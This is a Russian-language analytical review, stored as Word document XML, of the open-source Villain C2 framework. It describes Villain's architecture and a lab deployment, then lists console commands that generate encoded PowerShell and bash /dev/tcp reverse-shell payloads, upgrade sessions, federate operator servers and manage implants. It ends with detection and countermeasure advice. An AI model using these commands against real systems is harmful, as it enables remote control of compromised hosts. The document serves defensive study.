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ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Фреймворк командно-контрольного взаимодействия Villain:</w:t>
        <w:br/>
        <w:t>архитектура, возможности и меры обнаружения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Аналитический обзор инструмента для совместных операций red team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Аннотация. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>В работе рассматривается Villain — фреймворк командно-контрольного взаимодействия (Command-and-Control, C2) с открытым исходным кодом, превращающий консоль одного оператора в совместную платформу тестирования защищённости. Описаны архитектура, ключевые возможности (генерация полезных нагрузок для Windows и Linux, управление множественными сессиями, федерация «дочерних серверов» для совместной работы), порядок развёртывания и типовые команды. Основное внимание уделено анализу характерных признаков активности инструмента и мерам его обнаружения и противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>информационная безопасность; командно-контрольное взаимодействие; C2; Villain; HoaxShell; постэксплуатация; обнаружение угроз; red team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Фреймворки командно-контрольного взаимодействия используются как в наступательном тестировании защищённости, так и реальными злоумышленниками для управления скомпрометированными узлами. Villain, разрабатываемый под псевдонимом t3l3machus, отличается возможностью федерации независимых экземпляров («дочерних серверов»), позволяющей нескольким операторам в реальном времени совместно использовать перехваченные сессии. Цель настоящей работы — систематизировать архитектуру и возможности инструмента с точки зрения защитника и сформулировать меры его обнаружения и противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Архитектура и ключевые возможности</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Villain построен на технике HoaxShell — реверс-оболочке поверх HTTP/HTTPS, маскирующей управляющий трафик под обычные веб-запросы. К ключевым возможностям относятся: генерация реверс-оболочек и HoaxShell-нагрузок для Windows и Linux; мультиобработчики для reverse TCP и HoaxShell; встроенный HTTP-модуль доставки инструментов; интеграция ConPtyShell для полноценных интерактивных оболочек Windows; присвоение псевдонимов сессиям, перенаправители и учёт имплантов. Федерация дочерних серверов обеспечивает синхронизацию сессий между экземплярами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Испытательный стенд</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Стенд включает: атакующий узел Kali Linux (192.168.1.17) в роли основного оператора Villain; целевой узел Windows (192.168.1.12); целевой узел Linux (192.168.1.11) с двумя сетевыми интерфейсами как точку горизонтального перемещения; дочерний сервер на базе Ubuntu (192.168.1.9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Развёртывание и запуск</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Клонирование репозитория и запуск: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git clone https://github.com/t3l3machus/villain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cd villain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python Villain.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При запуске инициализируются четыре фоновые службы: командный сервер для федерации (порт 6501), мультиобработчик reverse TCP (порт 4443), мультиобработчик HoaxShell (порт 8080) и HTTP-модуль доставки (порт 8888). Перечень команд выводится по команде help.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Генерация нагрузок и работа с сессиями</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.1. Кодированная reverse-TCP нагрузка для Windows (PowerShell):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generate payload=windows/reverse_tcp/powershell lhost=eth0 encode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После исполнения на цели регистрируется новая сессия. Просмотр и вход в псевдо-оболочку, повышение до интерактивной ConPtyShell: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sessions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shell &lt;session-id&gt;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conptyshell eth0 1234 &lt;session-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5.2. Reverse-TCP нагрузка для Linux (компактный /dev/tcp-однострочник, порт 4443):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generate payload=linux/reverse_tcp/bash_read_line lhost=eth0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Анализ интерфейсов захваченной сессии выявляет узел с двумя подключениями, служащий точкой перемещения во внутреннюю подсеть.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Федерация дочерних серверов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Подключение основного сервера к дочернему и подтверждение одноразовым кодом на стороне Ubuntu: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connect 192.168.1.9 6501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# на дочернем сервере: python3 Villain.py  -&gt;  ввод одноразового кода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siblings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>После синхронизации оба сервера отображают сессии обоих целевых узлов, а команда siblings подтверждает активный статус подключённого узла.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Команды управления сессиями</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Основные команды: sessions (перечень активных оболочек); shell &lt;ID&gt; (вход в псевдо-оболочку); backdoors (сводка установленных имплантов: тип, обработчик, стабильность, статус); redirectors (маршрутизация трафика федеративных сессий); alias &lt;имя&gt; &lt;ID&gt; (назначение понятной метки); kill &lt;псевдоним&gt; (завершение сессии); purge (удаление сохранённых метаданных сессий). Пример присвоения псевдонимов и завершения сессии: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alias raj-ubuntu &lt;session-id&gt;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alias raj-server &lt;session-id&gt;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kill raj-ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Меры обнаружения и противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Исходя из характерных признаков активности Villain, рекомендуется: включить глубокое журналирование PowerShell (Script Block Logging, Module Logging, транскрипцию) с передачей в SIEM для выявления кодированных однострочников и обхода AMSI; применять EDR с поведенческим анализом (запуск Invoke-ConPtyShell с созданием PTY, исходящие TCP-соединения PowerShell, перенаправления bash /dev/tcp); ограничивать исходящий трафик по белому списку и блокировать порты обработчиков (4443, 8080, 6501, 8888); сегментировать сеть и применять узловые межсетевые экраны для предотвращения перемещения с двухдомных узлов; использовать разрешённые списки приложений (WDAC, AppLocker); соблюдать принцип минимальных привилегий; выявлять C2-маячки (периодические исходящие запросы, необычные user-agent, долгоживущие соединения с одним узлом); проводить непрерывное обновление и усиление конфигурации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>9. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Villain объединяет этапы постэксплуатации — генерацию нагрузок, повышение оболочек, обнаружение путей перемещения, федерацию серверов, управление сессиями — в единую консоль, а архитектура дочерних серверов делает его эффективным для совместных операций red team. С точки зрения защиты знание характерных признаков его активности позволяет выстроить эшелонированное обнаружение: журналирование интерпретаторов, поведенческий анализ конечных точек, контроль исходящего трафика и сегментацию сети. Эффективность защиты определяется сочетанием этих мер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Список источников</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. t3l3machus. Villain: C2 framework. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. t3l3machus. HoaxShell: an unconventional HTTP(S) reverse shell. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. MITRE ATT&amp;CK. Command and Control (TA0011); Application Layer Protocol: Web Protocols (T1071.001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Microsoft. PowerShell Script Block Logging and Antimalware Scan Interface (AMSI) documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Microsoft. Windows Defender Application Control (WDAC) and AppLocker documentation.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ind w:firstLine="567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